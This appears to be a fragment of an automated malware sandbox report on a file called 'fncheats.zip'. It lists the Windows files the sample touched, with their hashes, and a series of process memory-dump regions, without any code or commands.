C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5ba388a6597d5e09191c2c88d2fdf598

SHA1
13516f8ec5a99298f6952438055c39330feae5d8

SHA256
e6b6223094e8fc598ad12b3849e49f03a141ccd21e0eaa336f81791ad8443eca

SHA512
ead2a2b5a1c2fad70c1cf570b2c9bfcb7364dd9f257a834eb819e55b8fee78e3f191f93044f07d51c259ca77a90ee8530f9204cbae080fba1d5705e1209f5b19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
687b3558d687becb30ad8f90997723cc

SHA1
fb326d7d105aba4d26e1764e73fd124cad23f298

SHA256
5283507c63132fdaf5d64bb0a09bcd6ae6d412a4df0be934268bf8e774207ece

SHA512
f827d61fad06764cefbca1688b8b2df7c07a1080be42f524de9765650382db84151ee90dd74b6568ea6f5bc582399695ec2c1c598256076f2dc91ff250450abd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7d0a88a752a930e870c5b8f3a80a8432

SHA1
d48a677b76960f80038d4ee7a4d6d008e1a43ec8

SHA256
691df777f00dc62ee1f2abfea64ab7705aaafe5d788da0377ae6e5e3c1c8f550

SHA512
82d8488dd48554abf6775eb673f6b02e092e50ea7c9710b1d27404352163a09fcd637e6e7bb0ab083e0e397a8afa76f324d41861f45675aa46fcf370f326015c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wuroggwg.dsf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\fncheats.zip

Filesize
28KB

MD5
9447ebafa5a1fdb26839ceed6c05e31a

SHA1
f63841237366f8a4de46423e5a9b5e9caeaf0e07

SHA256
59ade4dd4246a5ae96eb3d0203e552e03908082cd668672cf522a05bd92fbfa3

SHA512
e2279e20fdbb3e00bd6968969a398baa5e503c7c139dbfb944b3229f67ceddddf82bdd6e10caebe22ae25a6594fe99f6eba0d2af12314973d76b8a3bcfa610b9

Download Submit
C:\Users\Admin\Downloads\fncheats.zip:Zone.Identifier

Filesize
98B

MD5
cdb35cb95053aa04f88a20e01c48c945

SHA1
b6a7ace53d5385b20f7764b5eed343317f81cda2

SHA256
0523529661b08287e24532faf63cdc7225895388580d737e03c4a53f116ef2a9

SHA512
2b499346a8f943c5d27947c256f70153b0972684775071671131379e8f744d8517416daebd48caf229d70e731ef8771595a3e7544426a6706e2da2c7557c2484

Download Submit
memory/1496-40-0x0000016DAB030000-0x0000016DAB052000-memory.dmp

Filesize
136KB

Download
memory/4640-30-0x00007FFAE96B0000-0x00007FFAE97BE000-memory.dmp

Filesize
1.1MB

Download
memory/4640-26-0x00007FF74FB20000-0x00007FF74FC18000-memory.dmp

Filesize
992KB

Download
memory/4640-27-0x00007FFB02760000-0x00007FFB02794000-memory.dmp

Filesize
208KB

Download
memory/4640-28-0x00007FFAEAA90000-0x00007FFAEAD46000-memory.dmp

Filesize
2.7MB

Download
memory/4640-29-0x00007FFAE5040000-0x00007FFAE60F0000-memory.dmp

Filesize
16.7MB

Download
memory/5004-11-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp

Filesize
10.8MB

Download
memory/5004-8-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp

Filesize
10.8MB

Download
memory/5004-41-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp

Filesize
10.8MB

Download
memory/5004-0-0x00007FFAF1663000-0x00007FFAF1665000-memory.dmp

Filesize
8KB

Download
memory/5004-18-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp

Filesize
10.8MB

Download
memory/5004-17-0x00007FFAF1663000-0x00007FFAF1665000-memory.dmp

Filesize
8KB

Download
memory/5004-68-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp

Filesize
10.8MB

Download
memory/5004-10-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp

Filesize
10.8MB

Download
memory/5004-9-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp

Filesize
10.8MB

Download
memory/5004-31-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp

Filesize
10.8MB

Download
memory/5004-6-0x0000019F28F50000-0x0000019F28F88000-memory.dmp

Filesize
224KB

Download
memory/5004-7-0x0000019F10490000-0x0000019F1049E000-memory.dmp

Filesize
56KB

Download
memory/5004-5-0x0000019F10450000-0x0000019F1045A000-memory.dmp

Filesize
40KB

Download
memory/5004-4-0x0000019F10460000-0x0000019F10468000-memory.dmp

Filesize
32KB

Download
memory/5004-3-0x0000019F28F10000-0x0000019F28F50000-memory.dmp

Filesize
256KB

Download
memory/5004-2-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp

Filesize
10.8MB

Download
memory/5004-1-0x0000019F0D0D0000-0x0000019F0E69E000-memory.dmp

Filesize
21.8MB

Download
memory/8264-582-0x000001F530640000-0x000001F530802000-memory.dmp

Filesize
1.8MB

Download
memory/8264-585-0x000001F530E40000-0x000001F531368000-memory.dmp

Filesize
5.2MB

Download
memory/8264-581-0x000001F515FB0000-0x000001F515FC8000-memory.dmp

Filesize
96KB

Download